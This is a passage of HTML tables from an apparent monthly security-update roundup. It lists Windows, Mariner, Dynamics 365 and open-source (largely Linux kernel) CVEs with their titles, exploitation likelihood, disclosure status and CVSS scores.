Desktop Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21530">CVE-2026-21530</a></td><td><p>Windows Rich Text Edit Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32170">CVE-2026-32170</a></td><td><p>Windows Rich Text Edit Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40410">CVE-2026-40410</a></td><td><p>Windows SMB Client Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35415">CVE-2026-35415</a></td><td><p>Windows Storage Spaces Controller Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40414">CVE-2026-40414</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40401">CVE-2026-40401</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40413">CVE-2026-40413</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35422">CVE-2026-35422</a></td><td><p>Windows TCP/IP Driver Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34351">CVE-2026-34351</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40399">CVE-2026-40399</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34334">CVE-2026-34334</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40406">CVE-2026-40406</a></td><td><p>Windows TCP/IP Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33837">CVE-2026-33837</a></td><td><p>Windows TCP/IP Local Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40415">CVE-2026-40415</a></td><td><p>Windows TCP/IP Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42825">CVE-2026-42825</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34338">CVE-2026-34338</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40382">CVE-2026-40382</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40380">CVE-2026-40380</a></td><td><p>Windows Volume Manager Extension Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40408">CVE-2026-40408</a></td><td><p>Windows WAN ARP Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34333">CVE-2026-34333</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34347">CVE-2026-34347</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35417">CVE-2026-35417</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3>Mariner vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7598">CVE-2026-7598</a></td><td><p>libssh2 userauth.c userauth_password integer overflow</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43870">CVE-2026-43870</a></td><td><p>Apache Thrift: Node.js web_server.js multi-vulnerability</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43868">CVE-2026-43868</a></td><td><p>Apache Thrift: Rust implementation vulnerable to CVE-2020-13949 pattern</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43869">CVE-2026-43869</a></td><td><p>Apache Thrift: TSSLTransportFactory.java hostname verification</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr></tbody></table><h3>Microsoft Dynamics vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33821">CVE-2026-33821</a></td><td><p>Microsoft Dynamics 365 Customer Insights Elevation of Privilege Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>7.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40417">CVE-2026-40417</a></td><td><p>Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42898">CVE-2026-42898</a></td><td><p>Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42833">CVE-2026-42833</a></td><td><p>Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40374">CVE-2026-40374</a></td><td><p>Microsoft Power Automate Desktop Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><p></p><p></p><p></p><h3>Open Source Software vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31706">CVE-2026-31706</a></td><td><p>ksmbd: validate num_aces and harden ACE walk in smb_inherit_dacl()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31723">CVE-2026-31723</a></td><td><p>usb: gadget: f_subset: Fix net_device lifecycle with device_move</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31724">CVE-2026-31724</a></td><td><p>usb: gadget: f_eem: Fix net_device lifecycle with device_move</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43053">CVE-2026-43053</a></td><td><p>xfs: close crash window in attr dabtree inactivation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43048">CVE-2026-43048</a></td><td><p>HID: core: Mitigate potential OOB by removing bogus memset()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31777">CVE-2026-31777</a></td><td><p>ALSA: ctxfi: Check the error for index mapping</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31722">CVE-2026-31722</a></td><td><p>usb: gadget: f_rndis: Fix net_device lifecycle with device_move</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43036">CVE-2026-43036</a></td><td><p>net: use skb_header_pointer() for TCPv4 GSO frag_off check</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31769">CVE-2026-31769</a></td><td><p>gpib: fix use-after-free in IO ioctl handlers</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31707">CVE-2026-31707</a></td><td><p>ksmbd: validate response sizes in ipc_validate_msg()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31725">CVE-2026-31725</a></td><td><p>usb: gadget: f_ecm: Fix net_device lifecycle with device_move</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43049">CVE-2026-43049</a></td><td><p>HID: logitech-hidpp: Prevent use-after-free on force feedback initialisation failure</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43022">CVE-2026-43022</a></td><td><p>Bluetooth: hci_sync: hci_cmd_sync_queue_once() return -EEXIST if exists</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43042">CVE-2026-43042</a></td><td><p>mpls: add seqcount to protect the platform_label{,s} pair</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31771">CVE-2026-31771</a></td><td><p>Bluetooth: hci_event: move wake reason storage into validated event handlers</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43052">CVE-2026-43052</a></td><td><p>wifi: mac80211: check tdls flag in ieee80211_tdls_oper</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31709">CVE-2026-31709</a></td><td><p>smb: client: validate the whole DACL before rewriting it in cifsacl</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43021">CVE-2026-43021</a></td><td><p>Bluetooth: hci_sync: fix leaks when hci_cmd_sync_queue_once fails</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31712">CVE-2026-31712</a></td><td><p>ksmbd: require minimum ACE size in smb_check_perm_dacl()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43010">CVE-2026-43010</a></td><td><p>bpf: Reject sleepable kprobe_multi programs at attach time</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43019">CVE-2026-43019</a></td><td><p>Bluetooth: hci_conn: fix potential UAF in set_cig_params_sync</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31729">CVE-2026-31729</a></td><td><p>usb: typec: ucsi: validate connector number in ucsi_notify_common()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43045">CVE-2026-43045</a></td><td><p>mshv: Fix error handling in mshv_region_pin</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43009">CVE-2026-43009</a></td><td><p>bpf: Fix incorrect pruning due to atomic fetch precision tracking</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31715">CVE-2026-31715</a></td><td><p>f2fs: fix UAF caused by decrementing sbi-&gt;nr_pages[] in f2fs_write_end_io()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31697">CVE-2026-31697</a></td><td><p>crypto: ccp: Don't attempt to copy ID to userspace if PSP command failed</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31721">CVE-2026-31721</a></td><td><p>usb: gadget: f_hid: move list and spinlock inits from bind to alloc</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31711">CVE-2026-31711</a></td><td><p>smb: server: fix active_num_conn leak on transport allocation failure</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31699">CVE-2026-31699</a></td><td><p>crypto: ccp: Don't attempt to copy CSR to userspace if PSP command failed</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31694">CVE-2026-31694</a></td><td><p>fuse: reject oversized dirents in page cache</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31705">CVE-2026-31705</a></td><td><p>ksmbd: fix out-of-bounds write in smb2_get_ea() EA alignment</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43033">CVE-2026-43033</a></td><td><p>crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31696">CVE-2026-31696</a></td><td><p>rxrpc: Fix missing validation of ticket length in non-XDR key preparsing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31698">CVE-2026-31698</a></td><td><p>crypto: ccp: Don't attempt to copy PDH cert to userspace if PSP command failed</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31704">CVE-2026-31704</a></td><td><p>ksmbd: use check_add_overflow() to prevent u16 DACL size overflow</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31702">CVE-2026-31702</a></td><td><p>f2fs: fix use-after-free of sbi in f2fs_compress_write_end_io()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31708">CVE-2026-31708</a></td><td><p>smb: client: fix OOB read in smb2_ioctl_query_info QUERY_INFO path</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31700">CVE-2026-31700</a></td><td><p>net/packet: fix TOCTOU race on mmap'd vnet_hdr in tpacket_snd()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7598">CVE-2026-7598</a></td><td><p>libssh2 userauth.c userauth_password integer overflow</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43058">CVE-2026-43058</a></td><td><p>media: vidtv: fix pass-by-value structs causing MSAN warnings</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-37457">CVE-2026-37457</a></td><td><p></p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43964">CVE-2026-43964</a></td><td><p></p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>3.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43037">CVE-2026-43037</a></td><td><p>ip6_tunnel: clear skb2-&gt;cb[] in ip4ip6_err()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33190">CVE-2026-33190</a></td><td><p>CoreDNS TSIG authentication bypass on encrypted DNS transports</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33489">CVE-2026-33489</a></td><td><p>CoreDNS transfer plugin subzone ACL bypass via lexicographic zone comparison</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32936">CVE-2026-32936</a></td><td><p>CoreDNS DoH GET path missing size validation causes CPU and memory amplification</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32934">CVE-2026-32934</a></td><td><p>CoreDNS DNS-over-QUIC unbounded goroutine growth leads to denial of service</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35579">CVE-2026-35579</a></td><td><p>CoreDNS TSIG authentication bypass on gRPC, QUIC, DoH, and DoH3 transports</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43073">CVE-2026-43073</a></td><td><p>x86-64: rename misleadingly named '__copy_user_nocache()' function</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>2.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42151">CVE-2026-42151</a></td><td><p>Prometheus Azure AD remote write OAuth client secret exposed via config API</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42154">CVE-2026-42154</a></td><td><p>Prometheus: remote read endpoint allows denial of service via crafted snappy payload</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43125">CVE-2026-43125</a></td><td><p>dlm: validate length in dlm_search_rsb_tree</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43248">CVE-2026-43248</a></td><td><p>vhost: move vdpa group bound check to vhost_vdpa</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43176">CVE-2026-43176</a></td><td><p>wifi: rtw89: pci: validate release report content before using for RTL8922DE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43204">CVE-2026-43204</a></td><td><p>ASoC: qcom: q6asm: drop DSP responses for closed data streams</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43131">CVE-2026-43131</a></td><td><p>drm/amd/pm: Fix null pointer dereference issue</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43126">CVE-2026-43126</a></td><td><p>ALSA: mixer: oss: Add card disconnect checkpoints</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43127">CVE-2026-43127</a></td><td><p>ntfs3: fix circular locking dependency in run_unpack_ex</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43161">CVE-2026-43161</a></td><td><p>iommu/vt-d: Skip dev-iotlb flush for inaccessible PCIe device without scalable mode</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43198">CVE-2026-43198</a></td><td><p>tcp: fix potential race in tcp_v6_syn_recv_sock()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>4.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43245">CVE-2026-43245</a></td><td><p>ntfs: -&gt;d_compare() must not block</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71290">CVE-2025-71290</a></td><td><p>misc: ti_fpc202: fix a potential memory leak in probe function</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43137">CVE-2026-43137</a></td><td><p>ASoC: SOF: Intel: hda: Fix NULL pointer dereference</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43115">CVE-2026-43115</a></td><td><p>srcu: Use irq_work to start GP in tiny SRCU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43234">CVE-2026-43234</a></td><td><p>team: avoid NETDEV_CHANGEMTU event when unregistering slave</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71293">CVE-2025-71293</a></td><td><p>drm/amdgpu/ras: Move ras data alloc before bad page check</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43172">CVE-2026-43172</a></td><td><p>wifi: iwlwifi: fix 22000 series SMEM parsing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71285">CVE-2025-71285</a></td><td><p>net: qrtr: Drop the MHI auto_queue feature for IPCR DL channels</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>4.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43197">CVE-2026-43197</a></td><td><p>netconsole: avoid OOB reads, msg is not nul-terminated</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43185">CVE-2026-43185</a></td><td><p>ksmbd: fix signededness bug in smb_direct_prepare_negotiation()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71273">CVE-2025-71273</a></td><td><p>wifi: rtw88: Use devm_kmemdup() in rtw_set_supported_band()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43118">CVE-2026-43118</a></td><td><p>btrfs: fix zero size inode with non-zero size after log replay</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>3.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43109">CVE-2026-43109</a></td><td><p>x86: shadow stacks: proper error handling for mmap lock</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43153">CVE-2026-43153</a></td><td><p>xfs: remove xfs_attr_leaf_hasname</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43129">CVE-2026-43129</a></td><td><p>ima: verify the previous kernel's IMA buffer lies in addressable RAM</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43116">CVE-2026-43116</a></td><td><p>netfilter: ctnetlink: ensure safe access to master conntrack</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43274">CVE-2026-43274</a></td><td><p>mailbox: mchp-ipc-sbi: fix out-of-bounds access in mchp_ipc_get_cluster_aggr_irq()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43244">CVE-2026-43244</a></td><td><p>kcm: fix zero-frag skb in frag_list on partial sendmsg error</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43191">CVE-2026-43191</a></td><td><p>drm/amd/display: Adjust PHY FSM transition to TX_EN-to-PLL_ON for TMDS on DCN35</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a 